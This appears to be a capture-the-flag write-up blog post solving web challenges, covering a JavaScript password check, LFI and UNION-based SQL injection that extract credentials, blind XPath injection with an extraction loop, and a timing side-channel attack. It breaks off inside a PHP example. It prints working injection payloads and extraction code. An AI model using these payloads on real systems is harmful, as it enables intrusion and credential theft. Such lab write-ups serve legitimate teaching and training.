<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUj7jUGTFjOpBHSeL1dpNxGWKYzWkQ3jyPxR704ilowdgbQ8zIYm_CpqVICe193fP1T2ULb5JQ7a-YT4-cL5n0SH-pZlHWOdTIN5lzNViUQEOnEADxL4fOr88g6n2gI217MsREOO88Wis/s1600/Screenshot_16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUj7jUGTFjOpBHSeL1dpNxGWKYzWkQ3jyPxR704ilowdgbQ8zIYm_CpqVICe193fP1T2ULb5JQ7a-YT4-cL5n0SH-pZlHWOdTIN5lzNViUQEOnEADxL4fOr88g6n2gI217MsREOO88Wis/s1600/Screenshot_16.png" /> </a> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is the JavaScript code which existed in the same page.</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">http://pastebin.com/raw.php?i=7kC5cvjh </span></div>
</blockquote>
From this line, it was understood that the username was "admin".<br />
<blockquote class="tr_bq">
<div class="de1">
<span style="color: red;"> if(document.getElementById("utb").value=="admin")</span></div>
</blockquote>
The next line in the JS code told that the password length should be 7.<br />
<blockquote class="tr_bq">
<span style="color: red;">if(document.getElementById("ptb").value.length!=7)</span></blockquote>
Now comes the interesting part. It can be seen in the JS code that an "if" statement is used to verify the entered password, and it has six conditions combined with the logical AND (&&) operator. So I analyzed the first condition this way.<br />
<blockquote class="tr_bq">
<span style="color: red;">document.getElementById("ptb").value.charCodeAt(0) + document.getElementById("ptb").value.charCodeAt(1)==206</span></blockquote>
It is worth mentioning here that the JavaScript "charCodeAt" method returns the UTF-16 code unit (for these characters, the same as the Unicode code point) of the character at the specified index in a string.<br />
<br />
This tells us that the sum of the Unicode values of the first and second characters of our password should be equal to 206. Let's have a look at the second condition.<br />
<blockquote class="tr_bq">
<span style="color: red;">document.getElementById("ptb").value.charCodeAt(1) + document.getElementById("ptb").value.charCodeAt(2) == 201</span></blockquote>
This condition says that the sum of the Unicode values of the second and third characters of our password should be equal to 201. <br />
<br />
The remaining four conditions follow the same pattern: each one fixes the sum of two adjacent characters, so the password can be calculated with simple addition and subtraction once a single character is known. But we had to find the password that started with «# as its first two characters.<br />
<br />
So,<br />
<br />
the Unicode of « is 171<br />
the Unicode of # is 35<br />
<br />
171 + 35 = 206<br />
<br />
Following this pattern, let's find the third character using the second condition, which says that the Unicode values of the second and third characters of our password should add up to 201.<br />
<br />
We know the second character, don't we? The Unicode of second character is 35.<br />
<br />
So,<br />
<br />
201 - 35 = 166<br />
<br />
This tells us that the third character of the required password is the character with Unicode value 166, which is "¦" (the broken bar).<br />
<br />
So far the first three characters of our password are «, # and ¦<br />
<br />
Following this pattern, we could calculate the password manually, but some of the characters were unprintable, so it was better to calculate it with a small piece of code.<br />
<br />
<div style="text-align: left;">
So after calculations, I got the following Unicode values of the password: </div>
<blockquote class="tr_bq">
<ol style="text-align: left;">
<li><span style="color: #b45f06;">171 </span></li>
<li><span style="color: #b45f06;">35 </span></li>
<li><span style="color: #b45f06;">166 </span></li>
<li><span style="color: #b45f06;">18 </span></li>
<li><span style="color: #b45f06;">159 </span></li>
<li><span style="color: #b45f06;">21 </span></li>
<li><span style="color: #b45f06;">177</span></li>
</ol>
</blockquote>
So I just used the JavaScript "fromCharCode" function, which converts Unicode values into characters, to build the password and then computed its MD5 hash.<br />
<br />
Here is the little piece of JS code I wrote: <br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=FU1wsPXw </span></blockquote>
Here is the output:<br />
<blockquote class="tr_bq">
<span style="color: red;">0d6162bd63d6802283fa0c16514dc271</span></blockquote>
So this MD5 hash was the flag for this challenge. <br />
<br />
<div style="text-align: left;">
</div>
<h4>
3. Multi-level (LFI, SQLi, Decoding, etc)</h4>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYAVAX32n0dtLn7SYfHLI4nyXeqYe_ACbsWmwMs9zfBtT2zQ1kqUuo8oThpg9HHofXMGdHc5cq4RQgE02wsjS6Cj4eQMR_lQDnNojDkY0TrBWNFgwAvF9JUev9pg9BERHwfSx_fHNczI/s1600/Screenshot_17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnYAVAX32n0dtLn7SYfHLI4nyXeqYe_ACbsWmwMs9zfBtT2zQ1kqUuo8oThpg9HHofXMGdHc5cq4RQgE02wsjS6Cj4eQMR_lQDnNojDkY0TrBWNFgwAvF9JUev9pg9BERHwfSx_fHNczI/s1600/Screenshot_17.png" /></a></div>
<br />
This challenge was fun to solve, especially the last stage, where the password hash needed to be decoded back into plain text. I will be concise in explaining it because it is rather lengthy.<br />
<br />
It had different stages and a flag was provided at each stage.<br />
<br />
<h4 style="text-align: left;">
Stage #1:<br /> </h4>
In the first stage, I had to perform a simple LFI. The application was designed so that the name of the child page was passed in the URL and that page was included into the parent page at run time.<br />
<br />
Here is the URL that I noticed at first:<br />
<blockquote class="tr_bq">
<span style="color: blue;">/about.php?a=industrialization</span></blockquote>
After some attempts, I discovered that a config file (config.php) existed in a directory named "config" located in the parent directory of the current location. So I simply used the following URL to read the contents of the config file:<br />
<br />
<blockquote class="tr_bq">
<span style="color: red;">/about.php?a=../config/config.php</span></blockquote>
The output said: "Ops, where is the salt?! Yes it is here...."<br />
<br />
The salt was actually mentioned in an HTML comment, which could be seen by viewing the source code of the page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_4xLACHAh4w-JO3gx7N1WNW5KLKc2TG4zFvKRGMBNi-7Iw2cSye-7nYhXlNzTbgBcIcKGM4BjzUjFfC6vDC7StS3dVxDvSVVpCQ3bIcD83g10jNZwICJB4Mj6YRujnqnrKUyFaKZC9Q/s1600/Screenshot_18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_4xLACHAh4w-JO3gx7N1WNW5KLKc2TG4zFvKRGMBNi-7Iw2cSye-7nYhXlNzTbgBcIcKGM4BjzUjFfC6vDC7StS3dVxDvSVVpCQ3bIcD83g10jNZwICJB4Mj6YRujnqnrKUyFaKZC9Q/s1600/Screenshot_18.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The MD5 hash of this salt was the flag for this stage. I had to enter the salt on a page to unlock the second stage.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<h4 class="separator" style="clear: both; text-align: left;">
Stage #2:</h4>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
This stage was a simple SQL injection. Another page (beer.php) was unlocked after entering the salt discovered in the first stage, and that page had some links. The "id" parameter of the first link was vulnerable to SQLi. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
On triggering the SQLi (just putting a ' in the URL), another page was unlocked with the name "Kelly Green". An MD5 hash had to be entered on that page, so it was fairly obvious that I had to enter the password hash of the user named "Kelly Green". I extracted that user's information from the database using the link below (CONCAT_WS with CHAR(32,58,32) joins the columns with " : ").</div>
<blockquote class="tr_bq">
<span style="color: blue;">/beer.php?id=1' union select
1,CONCAT_WS(CHAR(32,58,32),id,name,surname,username,password),3 from
users where name="kelly" and surname="green" and 'x'='x</span></blockquote>
Here is the output:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">22 : Kelly : Green : S0ZH8BR22J5 : UzA5T05UWTRkZnNhNzgwZnNkNmI3OGY2YmRzNmFmdDg3NmFzZDY1OGE=</span></blockquote>
So after entering this hash, the final stage was unlocked.<br />
<br />
<h4 style="text-align: left;">
Stage #3:</h4>
In the second stage we extracted the password hash of Kelly Green. So in this last stage the hash needed to be cracked/decoded, and I had to enter the plain-text password of Kelly Green.<br />
<br />
This stage would have been more fun if a hint had not been provided right above the input field. The hint said: <br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><i>As you can see, the dbms is MySQL. In this dbms the comments on
tables are stored into the INFORMATION_SCHEMA db, inside the table
TABLE.</i>
</span></blockquote>
This hint made it pretty obvious that the encoding or encryption algorithm was stored in the table comment. So I used the following query to extract the comment on the "users" table. <br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">/beer.php?id=1' union select 1,table_comment,3 from information_schema.tables where table_schema=database() and table_name="users" and 'x'='x </span></blockquote>
Here is the output: <br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">password = base64(base64(password) + salt) </span></blockquote>
So I had the salt extracted in the first stage, the password "hash" extracted in the second stage, and this algorithm. The stored value is not a hash at all but a reversible encoding, so there was nothing to crack: it took only a few seconds to decode it and get the plain text.<br />
<br />
The plain-text password (i.e. "KON568") was the third flag for this challenge. <br />
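The decoding step, as an added example rather than the author's own code: the scheme from the table comment, password = base64(base64(password) + salt), implemented in both directions. STORED is the value extracted in stage 2 and shown above. The salt itself is not printed on the page (it was in an HTML comment visible only in the screenshot), so the SALT constant below was derived by base64-decoding STORED and removing the leading base64("KON568"); the round trip in the test confirms the three values are consistent.

```javascript
// Added example, not the challenge's code. Reverses the stored-password
// encoding recovered from the MySQL table comment.
const STORED = 'UzA5T05UWTRkZnNhNzgwZnNkNmI3OGY2YmRzNmFmdDg3NmFzZDY1OGE='; // from stage 2
const SALT = 'dfsa780fsd6b78f6bds6aft876asd658a'; // derived from STORED, see lead-in

function b64(s) { return Buffer.from(s, 'utf8').toString('base64'); }
function unb64(s) { return Buffer.from(s, 'base64').toString('utf8'); }

// How the application "hashed" passwords: two base64 layers around a salt.
function storePassword(password, salt) {
  return b64(b64(password) + salt);
}

// The inverse. Because base64 is an encoding, not a hash, no cracking is
// needed; the only check is that the salt sits where the scheme says it does.
function recoverPassword(stored, salt) {
  const inner = unb64(stored);
  if (!inner.endsWith(salt)) throw new Error('salt not found at the end of the decoded value');
  return unb64(inner.slice(0, inner.length - salt.length));
}
```

`recoverPassword(STORED, SALT)` returns "KON568", and `storePassword('KON568', SALT)` reproduces STORED exactly. A wrong salt makes `recoverPassword` throw rather than return garbage, which is the behaviour you want when the "salt" has been pulled out of a page comment and might be mis-copied.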
<br />
Upon submitting the password, a GIF image was displayed on the page.<br />
<br />
The MD5 checksum of that image was the final flag for this challenge.<br />
<br />
<br />
<h4>
2. Blind XPath Injection </h4>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkKgZnVSkeoIfjRdR4MvrqEiAgoH8OdT7A6BbN5sl8753KzFkZn2euNczIJjL0m7ulrxxuf8tUy2FVCd4Vj-VlbvEtM-XEJKnC3TTF4tv7v6GQw30zr-MyRG3It76zu4NfYVw5CVKJXM/s1600/Screenshot_19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkKgZnVSkeoIfjRdR4MvrqEiAgoH8OdT7A6BbN5sl8753KzFkZn2euNczIJjL0m7ulrxxuf8tUy2FVCd4Vj-VlbvEtM-XEJKnC3TTF4tv7v6GQw30zr-MyRG3It76zu4NfYVw5CVKJXM/s1600/Screenshot_19.png" /></a></div>
<br />
This challenge was easy but time-consuming. Anyone familiar with blind exploitation of such injections will understand why. <br />
<br />
The goal was defined in the challenge description as follows:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><b>Your goal:</b> find the secret hidden among the information sent by a special customer.</span></blockquote>
This challenge had a small PHP application for a restaurant website. Two of the three pages had nothing of interest to a pen-tester, but the third page had a form for seat reservation. It also had a link to another page to check the status of a reservation by providing an email address and phone number.<br />
<br />
The first thing I did was reserve a seat for myself using that reservation form, testing along the way whether any parameter was vulnerable, which was not the case. But at least I reserved a seat for myself in "one of the most important restaurants in the world," as the challenge information described it.<br />
<br />
Anyway, after doing so I opened the page to check my reservation. The page had a form which looked like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJP8I2Eyi-9U33PJPt1vGoSY8LybsHgHnX4HfaOhp_svOfMAOmVTibizX62nyv6ZPxmaUXFbq3fhO_Rw26e_mxu9Bw8sMHlHofVTkxo8BVmPI2BH27GYn1mSjFRybcWRoTEvRrz_mEM8/s1600/Screenshot_20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvJP8I2Eyi-9U33PJPt1vGoSY8LybsHgHnX4HfaOhp_svOfMAOmVTibizX62nyv6ZPxmaUXFbq3fhO_Rw26e_mxu9Bw8sMHlHofVTkxo8BVmPI2BH27GYn1mSjFRybcWRoTEvRrz_mEM8/s1600/Screenshot_20.png" height="219" width="577" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The email field in this form was vulnerable to blind XPath injection, which I deduced by comparing the positive and negative results of submitting the form as follows:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Positive: </b></div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><b>URL</b>:</span> <span style="color: blue;">/checkreservation.php</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='1 </span></div>
</blockquote>
<b>Negative: </b><br />
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><b>URL</b>:</span> <span style="color: blue;">/checkreservation.php</span></div>
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='2</span></blockquote>
Later I realized I could send the same parameters in a GET request as well (not important, but it makes things a bit easier). Anyway, I started exploiting it manually using XPath's "substring" function, but soon realized that it was going to take an eternity this way. So I tried a Python tool named "xcat". It worked, but it was so slow that it took about 30 minutes to extract the information of the first user in the document, and the secret was not stored in the first user's information. What a disappointment that was! By the time it reached the 4th user the session had expired, and the secret was still not found. But it did help, because now I knew the element names and I could tell which element contained the required secret message. This was the structure of the XML document:<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=kEQdcGF7</span></blockquote>
So I wrote a little PHP script to extract only the text of the "info" element, which I believed contained the secret. First I manually discovered the length of the text in the "info" element and then used the script to extract the contents. I started from the second user, as I already knew that the first user's info did not hold the secret, and found it in the info of the 7th user.<br />
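The extraction loop described above, as an added example that is not the author's script: a boolean oracle built from the reservation check, then length discovery followed by one character at a time. The XML layout (a list of "customer" elements each holding an "info" child) is an assumption, since the page only says the secret sat in an "info" element of the 7th customer and the pastebin with the real structure is gone. The "server" side here is a constructed stand-in that evaluates only the two predicate shapes the attack needs; it is not an XPath engine, and the reservation data is made up.

```javascript
// Added example, not the author's code. Simulated blind XPath injection.

// Constructed reservation data standing in for the real XML document.
const CUSTOMERS = [
  { email: 'a@example.com', info: 'window seat' },
  { email: 'b@example.com', info: 'none' },
  { email: 't3hg00n@yahoo.com', info: 'Giuseppe did a great job!' },
];

// Stand-in for checkreservation.php: the email is spliced into a predicate
// like //customer[email='<email>'], so "<email>' and <cond> and '1'='1"
// turns <cond> into a true/false question answered by the page's response.
function checkReservation(email) {
  const m = email.match(/^(.*?)' and (.*)$/);
  if (!m) return CUSTOMERS.some(c => c.email === email);
  const [, realEmail, predicate] = m;
  return CUSTOMERS.some(c => c.email === realEmail) && evalPredicate(predicate);
}

function evalPredicate(p) {
  if (p === "'1'='1") return true;
  if (p === "'1'='2") return false;
  const tail = " and '1'='1";
  return p.endsWith(tail) ? evalCondition(p.slice(0, -tail.length)) : false;
}

// Only the two XPath 1.0 forms the attacker uses. As in real XPath, an absent
// node converts to the empty string, so string-length(...) of a missing
// customer is 0, which is how the loop below notices it has run out of users.
function evalCondition(cond) {
  let m = cond.match(/^string-length\(\/\/customer\[(\d+)\]\/info\)=(\d+)$/);
  if (m) { const c = CUSTOMERS[Number(m[1]) - 1]; return c ? c.info.length === Number(m[2]) : Number(m[2]) === 0; }
  m = cond.match(/^substring\(\/\/customer\[(\d+)\]\/info,(\d+),1\)='(.)'$/);
  if (m) { const c = CUSTOMERS[Number(m[1]) - 1]; return !!c && c.info.charAt(Number(m[2]) - 1) === m[3]; }
  return false;
}

// Attacker side: one "request" per question, using our own valid email as the base.
function ask(cond) {
  return checkReservation(`t3hg00n@yahoo.com' and ${cond} and '1'='1`);
}

function findLength(index, max = 200) {
  for (let n = 0; n <= max; n++) {
    if (ask(`string-length(//customer[${index}]/info)=${n}`)) return n;
  }
  return -1;
}

// XPath 1.0 cannot compare characters numerically, so each position is a
// linear scan over a charset; XPath 2.0's string-to-codepoints() would allow
// a binary search instead.
const CHARSET = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!.,?-_@";

function extractInfo(index) {
  const len = findLength(index);
  if (len < 0) return null;
  let out = '';
  for (let pos = 1; pos <= len; pos++) {
    let found = '?';
    for (const ch of CHARSET) {
      if (ask(`substring(//customer[${index}]/info,${pos},1)='${ch}'`)) { found = ch; break; }
    }
    out += found;
  }
  return out;
}
```

`extractInfo(3)` recovers the third customer's info one character per charset hit, which is why the author's run took so long: every character costs up to one request per charset entry, on top of one request per candidate length. Discovering the length first, as the write-up did manually, is what bounds the loop.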
<br />
Here is the little script I wrote:<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=REiFeShx</span></blockquote>
Here is the output it generated. Before I show the final output, I must admit that I had a mini heart-attack when it reached this point after about 20 minutes:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi19i4C2PIvA7jqtW7sDc7LVOsC-1HOICjSy7PjJeeLVLuiVJZkRKGOQWl38wTXbj3yBTORvl2XYGSk3-nCTte8zwjWnfZiGjYVT81Lhwn0WiVPLwReicfZ8FtiBPDfVPeRYLVwWYE8ARQ/s1600/Screenshot_21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi19i4C2PIvA7jqtW7sDc7LVOsC-1HOICjSy7PjJeeLVLuiVJZkRKGOQWl38wTXbj3yBTORvl2XYGSk3-nCTte8zwjWnfZiGjYVT81Lhwn0WiVPLwReicfZ8FtiBPDfVPeRYLVwWYE8ARQ/s1600/Screenshot_21.png" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Because I had already spent about an hour extracting the users' information in the hope of finding the secret. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is the final output:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTd2X-w7coUPPU-89r4qRHaq6tTeRxWt6CxOBo-CqF6uqd4JdeRX-Dm8q45B4lUn37xoTuNJq-vW4571LxAfvDO-4H4anevjxUnI9FyIF_i85n-kJTL8CFNNG17Pj6kUqKhntyBahIUw/s1600/Screenshot_23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTd2X-w7coUPPU-89r4qRHaq6tTeRxWt6CxOBo-CqF6uqd4JdeRX-Dm8q45B4lUn37xoTuNJq-vW4571LxAfvDO-4H4anevjxUnI9FyIF_i85n-kJTL8CFNNG17Pj6kUqKhntyBahIUw/s1600/Screenshot_23.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
The MD5 hash of this secret (Giuseppe did a great job!) was the flag for this challenge.<br />
<br />
<br />
<h4>
1. Guess the Password (Side Channeling)</h4>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirsb0feolvq2ZpWQ9aeBySxHfPZijpGvmtLAsAU9Jh3g3vepRIG30ZRhWqhLfADS07TyE12ROnXaz0FhEC2F3WV-tPPmXX45noi59rzdd4bSk48no1PIkn7srUnew5uKHyMbsJwoJxiIw/s1600/Screenshot_22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirsb0feolvq2ZpWQ9aeBySxHfPZijpGvmtLAsAU9Jh3g3vepRIG30ZRhWqhLfADS07TyE12ROnXaz0FhEC2F3WV-tPPmXX45noi59rzdd4bSk48no1PIkn7srUnew5uKHyMbsJwoJxiIw/s1600/Screenshot_22.png" /></a></div>
<br />
<br />
<br />
This challenge was misleading. The title was misleading, plus it had only 100 points, so I thought: how difficult could it be? It should be easy, so I tried to solve it second (after finishing the 50-point challenge) but gave up after spending about 30 minutes on it and moved on to the next challenge (I didn't want to waste time and wanted to solve as many challenges as possible in less time).<br />
<br />
After solving all other challenges, I came back to this. The main page had a form with one input field which can be seen in the screenshot below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1c5DO9o_iXbXy3CDrHkSHjvACNuijVY2vc4O-47nsDdXABQDRkHsdRLP79nfQvHJcCLyZvdorwJ9CnVaA0o7bZCGDE9jzNk0tVIO6VK28Z7y0QKoxTqF4KuFx3pKvDjENk3itNtPptMs/s1600/Screenshot_24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1c5DO9o_iXbXy3CDrHkSHjvACNuijVY2vc4O-47nsDdXABQDRkHsdRLP79nfQvHJcCLyZvdorwJ9CnVaA0o7bZCGDE9jzNk0tVIO6VK28Z7y0QKoxTqF4KuFx3pKvDjENk3itNtPptMs/s1600/Screenshot_24.png" height="184" width="320" /></a></div>
<br />
<br />
I started by analyzing headers, cookies and the HTML source, expecting the password to be hidden somewhere, but on the first attempt I couldn't find anything of interest. Then I thought maybe it's a simple brute-force challenge; maybe a common weak password is used. With this thought in mind, I coded a little script and started brute-forcing using a list of the 1000 most common passwords. Result? Disappointed.<br />
<br />
Here is how the form request was submitted:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><b>URL:</b></span> <span style="color: blue;">/index.php</span><br />
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">password=test</span></blockquote>
And here is the resulting page:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFT7UolveqiUL1vfSTaMNhS6TcnkSZij_fDWBPmrPVRKyYiWHxYpiBnt6dmlb36coF4B8TB7sXt6cblQrbFg9gwYTUUj34ORPvCfym8Yq2DVsspyP66nrm4n6oSdi2C1tehnLym2EdV4/s1600/Screenshot_26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivFT7UolveqiUL1vfSTaMNhS6TcnkSZij_fDWBPmrPVRKyYiWHxYpiBnt6dmlb36coF4B8TB7sXt6cblQrbFg9gwYTUUj34ORPvCfym8Yq2DVsspyP66nrm4n6oSdi2C1tehnLym2EdV4/s1600/Screenshot_26.png" /></a></div>
I am not afraid or ashamed to admit that I had never heard of "side channeling" attacks before and had never used one, and that's the reason why, even after spending 2 hours on this challenge, I could not figure it out. I must admit that I was annoyed.<br />
<br />
Anyway, I checked the HTML source once again and found this interesting comment there.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRzKd69xctGXRqmzC5ayLqpXIEQr4N0clpDYF2DjP_XXO6B4tR837WYDAcmOzV6AVdajljNHsiTplT2JByPNpYAxkTyQXcPYAq511TDkDd7xNwQIWaFg9YU4tnTkCgckB2WvbebmS-XYU/s1600/Screenshot_25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRzKd69xctGXRqmzC5ayLqpXIEQr4N0clpDYF2DjP_XXO6B4tR837WYDAcmOzV6AVdajljNHsiTplT2JByPNpYAxkTyQXcPYAq511TDkDd7xNwQIWaFg9YU4tnTkCgckB2WvbebmS-XYU/s1600/Screenshot_25.png" /></a></div>
"?debug for DEBUGGING" - I started wondering what it could possibly mean. I included a "debug" parameter in the URL and analyzed the source, but it was the same with and without the parameter.<br />
<br />
After trying many things using this hint, I tampered with the password submission request and sent the request as below:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;"><b>URL:</b></span> <span style="color: blue;">/index.php?debug</span><br />
<span style="color: #b45f06;"><b>POST data:</b></span> <span style="color: red;">password=test</span></blockquote>
At first the result looked exactly the same. But after checking the source, I discovered that there was some additional content in the result; it was an HTML comment, which can be seen in the screenshot below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsdQzNbmW9iw95N8D9EgRHLenDYE0nQ99AkFGzMY6lgA8t_XtAZCBKupyFJRAlgbCIgbAZQlNvhCeEH6ToswYILh2tQkSjRN_vWXgMt1wE8RfMAJdUPIOsa6OGucOkbM8kui53yYdxlt0/s1600/Screenshot_29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsdQzNbmW9iw95N8D9EgRHLenDYE0nQ99AkFGzMY6lgA8t_XtAZCBKupyFJRAlgbCIgbAZQlNvhCeEH6ToswYILh2tQkSjRN_vWXgMt1wE8RfMAJdUPIOsa6OGucOkbM8kui53yYdxlt0/s1600/Screenshot_29.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Now that was something interesting. I started testing the process time with different inputs in the hope of finding the length of the password or the charset used; for a few inputs it remained the same. After a few inputs, I submitted password=test and this was the result:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw2G2SqSWwXR6srMHtax431OAhwAgdmkL0TEnX6CmoTjjao4Jy5XXrUoLkuzFUr_UbjWLmPSMKRrHGiWuYyUHlRYLQnZ8Dr1aJTiM4jij6VosGT00GsGOSAqKM6vzBABKvQtsmedfBS-E/s1600/Screenshot_30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw2G2SqSWwXR6srMHtax431OAhwAgdmkL0TEnX6CmoTjjao4Jy5XXrUoLkuzFUr_UbjWLmPSMKRrHGiWuYyUHlRYLQnZ8Dr1aJTiM4jij6VosGT00GsGOSAqKM6vzBABKvQtsmedfBS-E/s1600/Screenshot_30.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
I noticed that the process time had changed. I submitted the same request again and noticed that the time fluctuated between 0.09 and 0.10. So I increased the length by adding more characters after the word "test", but the result remained the same. Then I started changing the letters of "test" one by one and analyzing the change in time, starting from the end and removing the letter if it didn't affect the time. So I was left with only this:</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;">password=t</span></div>
</blockquote>
When I changed the letter 't' to something else, the time became zero again. I tried all characters on the keyboard and the time remained zero. After putting 't' back the time was 0.1 again. At this point, I figured that the first letter of the password might be 't', because it was getting passed through the checks and there must be some processing going on for valid characters which takes some time, hence the increase in time. So after that, I added one letter after 't' and tried password=ta, but the time remained the same, i.e. 0.1. So once again I replaced 'a' with every character on my keyboard one after another, and when I had finished the upper- and lower-case alphabets, I entered password=t1 and this was the result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfOojR9u2GDow-koJ51PcA0VcMuNTazak7t1nL6UMmASEZA6vlWYBmfOnqLynFydwuY4boFbQinXzOnDR-sbrsdoIoeqWU-_2EzB9vcG4v98-88mnXYsv-u2dOf8CB0hqsubStChVbeM/s1600/Screenshot_31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXfOojR9u2GDow-koJ51PcA0VcMuNTazak7t1nL6UMmASEZA6vlWYBmfOnqLynFydwuY4boFbQinXzOnDR-sbrsdoIoeqWU-_2EzB9vcG4v98-88mnXYsv-u2dOf8CB0hqsubStChVbeM/s1600/Screenshot_31.png" /></a></div>
Yes, an addition of 0.1 in the time. This made me believe that I was going in the right direction and this was indeed the right way to "GUESS" the password. But just to be sure, I checked the third character manually and now I had first three valid characters of the password i.e. "t1c".<br />
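The 0.1 s steps above come from a check whose running time depends on how many leading characters are correct. As an added example (not the author's script, which was published separately), the following PHP models such a check beside a constant-time one and includes a small timing test a defender can keep as a regression check; it assumes PHP 7.3 or later, and the secret is the challenge password used only as a stand-in.

```php
<?php
// Added example, not the challenge's own script: a check that leaks the
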